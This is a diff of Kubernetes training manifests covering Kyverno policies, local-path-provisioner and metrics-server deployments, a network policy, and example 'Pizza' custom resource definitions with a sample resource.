- key: "{{ request.oldObject.metadata.labels.color || '' }}"
operator: NotEquals
value: ""
- key: "{{ request.object.metadata.labels.color || '' }}"
operator: Equals
value: ""
validate:
failureAction: Enforce
message: "Once label color has been added, it cannot be removed."
deny: {}

View File

@@ -1,46 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: tls-for-ingress
spec:
rules:
- name: create-role
match:
resources:
kinds:
- Certificate
generate:
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
rules:
- verbs:
- get
apiGroups:
- ""
resources:
- secrets
resourceNames:
- "{{request.object.metadata.name}}"
- name: create-rolebinding
match:
resources:
kinds:
- Certificate
generate:
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: "{{request.object.metadata.name}}"
subjects:
- kind: ServiceAccount
name: default
namespace: "{{request.object.metadata.namespace}}"

View File

@@ -1,50 +1,49 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: local-path-provisioner-role
namespace: local-path-storage
rules:
- apiGroups: [ "" ]
resources: [ "nodes", "persistentvolumeclaims", "configmaps" ]
verbs: [ "get", "list", "watch" ]
- apiGroups: [ "" ]
resources: [ "endpoints", "persistentvolumes", "pods" ]
verbs: [ "*" ]
- apiGroups: [ "" ]
resources: [ "events" ]
verbs: [ "create", "patch" ]
- apiGroups: [ "storage.k8s.io" ]
resources: [ "storageclasses" ]
verbs: [ "get", "list", "watch" ]
- apiGroups: [""]
resources: ["nodes", "persistentvolumeclaims"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["endpoints", "persistentvolumes", "pods"]
verbs: ["*"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: local-path-provisioner-bind
namespace: local-path-storage
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: apps/v1
kind: Deployment
@@ -63,28 +62,27 @@ spec:
spec:
serviceAccountName: local-path-provisioner-service-account
containers:
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.19
imagePullPolicy: IfNotPresent
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.8
imagePullPolicy: Always
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
volumes:
- name: config-volume
configMap:
name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
@@ -93,7 +91,6 @@ metadata:
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
@@ -102,59 +99,12 @@ metadata:
namespace: local-path-storage
data:
config.json: |-
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}
setup: |-
#!/bin/sh
while getopts "m:s:p:" opt
do
case $opt in
p)
absolutePath=$OPTARG
;;
s)
sizeInBytes=$OPTARG
;;
m)
volMode=$OPTARG
;;
esac
done
mkdir -m 0777 -p ${absolutePath}
teardown: |-
#!/bin/sh
while getopts "m:s:p:" opt
do
case $opt in
p)
absolutePath=$OPTARG
;;
s)
sizeInBytes=$OPTARG
;;
m)
volMode=$OPTARG
;;
esac
done
rm -rf ${absolutePath}
helperPod.yaml: |-
apiVersion: v1
kind: Pod
metadata:
name: helper-pod
spec:
containers:
- name: helper-pod
image: busybox
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}

View File

@@ -1,61 +1,32 @@
# This file is https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml
# But with the following arguments added to metrics-server:
# args:
# - --kubelet-insecure-tls
# - --metric-resolution=5s
apiVersion: v1
kind: ServiceAccount
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: system:aggregated-metrics-reader
labels:
k8s-app: metrics-server
rbac.authorization.k8s.io/aggregate-to-view: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
k8s-app: metrics-server
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-view: "true"
name: system:aggregated-metrics-reader
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
k8s-app: metrics-server
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
- namespaces
- configmaps
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
labels:
k8s-app: metrics-server
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
@@ -67,127 +38,101 @@ subjects:
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
labels:
k8s-app: metrics-server
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
k8s-app: metrics-server
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
name: v1beta1.metrics.k8s.io
spec:
service:
name: metrics-server
namespace: kube-system
group: metrics.k8s.io
version: v1beta1
insecureSkipTLSVerify: true
groupPriorityMinimum: 100
versionPriority: 100
---
apiVersion: v1
kind: Service
kind: ServiceAccount
metadata:
labels:
k8s-app: metrics-server
name: metrics-server
namespace: kube-system
spec:
ports:
- name: https
port: 443
protocol: TCP
targetPort: https
selector:
k8s-app: metrics-server
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
k8s-app: metrics-server
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
spec:
selector:
matchLabels:
k8s-app: metrics-server
strategy:
rollingUpdate:
maxUnavailable: 0
template:
metadata:
name: metrics-server
labels:
k8s-app: metrics-server
spec:
containers:
- args:
- --cert-dir=/tmp
- --secure-port=4443
- --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
- --kubelet-use-node-status-port
- --kubelet-insecure-tls
- --metric-resolution=5s
image: k8s.gcr.io/metrics-server/metrics-server:v0.4.3
imagePullPolicy: IfNotPresent
livenessProbe:
failureThreshold: 3
httpGet:
path: /livez
port: https
scheme: HTTPS
periodSeconds: 10
name: metrics-server
ports:
- containerPort: 4443
name: https
protocol: TCP
readinessProbe:
failureThreshold: 3
httpGet:
path: /readyz
port: https
scheme: HTTPS
periodSeconds: 10
securityContext:
readOnlyRootFilesystem: true
runAsNonRoot: true
runAsUser: 1000
volumeMounts:
- mountPath: /tmp
name: tmp-dir
nodeSelector:
kubernetes.io/os: linux
priorityClassName: system-cluster-critical
serviceAccountName: metrics-server
volumes:
- emptyDir: {}
name: tmp-dir
# mount in tmp so we can safely use from-scratch images and/or read-only containers
- name: tmp-dir
emptyDir: {}
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.3
imagePullPolicy: Always
volumeMounts:
- name: tmp-dir
mountPath: /tmp
args:
- --kubelet-preferred-address-types=InternalIP
- --kubelet-insecure-tls
- --metric-resolution=5s
---
apiVersion: apiregistration.k8s.io/v1
kind: APIService
apiVersion: v1
kind: Service
metadata:
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
name: v1beta1.metrics.k8s.io
kubernetes.io/name: "Metrics-server"
spec:
group: metrics.k8s.io
groupPriorityMinimum: 100
insecureSkipTLSVerify: true
service:
name: metrics-server
namespace: kube-system
version: v1beta1
versionPriority: 100
selector:
k8s-app: metrics-server
ports:
- port: 443
protocol: TCP
targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system

View File

@@ -1,20 +0,0 @@
kind: Pod
apiVersion: v1
metadata:
generateName: mounter-
labels:
container.training/mounter: ""
spec:
volumes:
- name: pvc
persistentVolumeClaim:
claimName: my-pvc-XYZ45
containers:
- name: mounter
image: alpine
stdin: true
tty: true
volumeMounts:
- name: pvc
mountPath: /pvc
workingDir: /pvc

View File

@@ -3,7 +3,8 @@ apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector: {}
podSelector:
matchLabels:
ingress:
- from:
- podSelector: {}

View File

@@ -14,7 +14,7 @@ spec:
initContainers:
- name: git
image: alpine
command: [ "sh", "-c", "apk add git && sleep 5 && git clone https://github.com/octocat/Spoon-Knife /www" ]
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/

View File

@@ -1,24 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: openebs-local-hostpath-pod
spec:
volumes:
- name: storage
persistentVolumeClaim:
claimName: local-hostpath-pvc
containers:
- name: better
image: alpine
command:
- sh
- -c
- |
while true; do
echo "$(date) [$(hostname)] Kubernetes is better with PVs." >> /mnt/storage/greet.txt
sleep $(($RANDOM % 5 + 20))
done
volumeMounts:
- mountPath: /mnt/storage
name: storage

View File

@@ -1,14 +0,0 @@
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: pizzas.container.training
spec:
group: container.training
version: v1alpha1
scope: Namespaced
names:
plural: pizzas
singular: pizza
kind: Pizza
shortNames:
- piz

View File

@@ -1,20 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: pizzas.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: pizzas
singular: pizza
kind: Pizza
shortNames:
- piz
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object

View File

@@ -1,32 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: pizzas.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: pizzas
singular: pizza
kind: Pizza
shortNames:
- piz
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
required: [ spec ]
properties:
spec:
type: object
required: [ sauce, toppings ]
properties:
sauce:
type: string
toppings:
type: array
items:
type: string
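With this schema, a valid custom resource must have a spec containing a sauce string and a toppings list of strings; a minimal sketch:

apiVersion: container.training/v1alpha1
kind: Pizza
metadata:
  name: margherita
spec:
  sauce: tomato
  toppings:
  - mozzarella
  - basil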

Some files were not shown because too many files have changed in this diff.